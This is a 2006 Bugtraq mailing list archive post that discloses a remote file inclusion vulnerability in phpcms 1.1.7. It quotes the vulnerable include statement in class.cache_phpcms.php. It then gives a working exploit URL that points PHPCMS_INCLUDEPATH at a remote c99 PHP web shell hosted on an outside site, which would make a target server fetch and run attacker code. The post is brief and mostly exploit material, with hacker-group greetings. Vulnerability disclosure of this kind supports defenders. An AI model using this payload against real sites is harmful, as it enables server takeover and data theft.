Bugtraq mailing list archives

phpcms <=- 1.1.7 Remote File Inclusion

From: Zarloule04 () gmail com
Date: 24 Dec 2006 23:28:20 -0000

#phpcms <=- 1.1.7 Remote File Inclusion
#Download Source : #http://phpcms.de/files/phpcms_1_1_7.zip
#Found By : b0rizQ
#Greetz : Nuck3r + Crack_Man + Red_Casper + RaChidox + Broken-Proxy + S4mi

_____________________________________________________

File : class.cache_phpcms.php
--Bugs--------------------------------------
include ($PHPCMS_INCLUDEPATH.'/language.'.$DEFAULTS->LANGUAGE );
        if ( $DEFAULTS->STATS == 'on' )


--------------------------------------------
Exmple And Methode Exploit : 

http://www.traget.***/cms/include/class.cache_phpcms.php?PHPCMS_INCLUDEPATH=http://b0rizq.by.ru/c99.txt?


""""""""""www.b0rizQ.Biz"""""""""""""""""""""

Current thread:

phpcms <=- 1.1.7 Remote File Inclusion Zarloule04 (Dec 26)
- Re: phpcms <=- 1.1.7 Remote File Inclusion Hugo van der Kooij (Dec 27)
- <Possible follow-ups>
- Re: phpcms <=- 1.1.7 Remote File Inclusion Stuart Moore (Dec 26)